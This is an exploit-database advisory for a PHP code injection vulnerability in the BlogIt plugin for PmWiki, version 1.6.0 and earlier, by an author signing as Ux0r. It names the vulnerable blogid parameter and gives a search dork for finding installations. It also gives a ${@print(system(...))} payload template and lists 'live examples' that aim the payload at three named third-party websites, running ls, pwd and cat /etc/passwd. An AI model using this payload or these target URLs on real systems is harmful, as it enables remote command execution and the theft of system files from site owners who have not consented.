===================================================================
BlogIt <= 1.6.0 Php Code Injection Vulnerability
===================================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 0
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1
#[+] Discovered By : Ux0r
#[+] E-mail : ux0r@live.com
#[+] Home : http://ux0r.blogspot.com ~ http://mavi1.org
#[+] Message : Benim eski indekslerin üzerine yazmaya çalýþan lamerlere selam olsun. Beni güldürdünüz :)
Product : BlogIt
Version : <= 1.6.0
Site : http://www.pmwiki.org/wiki/Cookbook/BlogIt
Dork : "powered by blogIt"
= Error in file Site.BlogList =
Error code: (Line 11)
text=(:includesection "#blog-yearly-archive-pagelist blogid={(bi_ifnull '{$bi_BlogId}' blog1)} status=publish,sticky":)
A vulnerable parameter $bi_BlogId
= Exploit =
- http://site.com/path/Site/BlogList?blogid=${@print(...)} ; ... => php code injection
= Example =
- http://site.com/Site/BlogList?blogid=${@print(system('ls -la'))}
= Live examples =
- http://schniertshauer.com/Site/BlogList?blogid=${@print(system('ls -la'))}
- http://dotdelimited.com/Site/BlogList?blogid=${@print(system('pwd'))}
- http://tognela.net/Site/BlogList?blogid=${@print(system('cat /etc/passwd'))}
< Esenlikler dilerim. 2 bin 11 >
